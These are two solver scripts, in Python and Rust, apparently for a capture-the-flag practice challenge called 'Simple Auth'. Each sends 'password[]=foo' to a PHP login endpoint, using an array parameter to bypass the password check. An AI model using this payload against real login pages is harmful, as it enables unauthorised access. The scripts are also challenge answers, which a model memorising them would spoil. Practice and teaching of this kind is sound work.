File: 32_Simple_Auth/solve.py
from urllib import request, parse

url = 'http://ctfq.sweetduet.info:10080/~q32/auth.php'
data = parse.urlencode({'password[]': 'foo'}).encode('ascii')

with request.urlopen(url, data) as response:
    print(response.read().decode('utf-8'))

File: 32_Simple_Auth/solve.rs
// cargo-deps: reqwest = "0.8.5"

extern crate reqwest;

use reqwest::Client;

fn main() {
    let client = Client::new();
    let params = [("password[]", "foo")];

    let mut response = client
        .post("http://ctfq.sweetduet.info:10080/~q32/auth.php")
        .form(&params)
        .send()
        .unwrap();
    let body = response.text().unwrap();

    println!("{}", body);
}
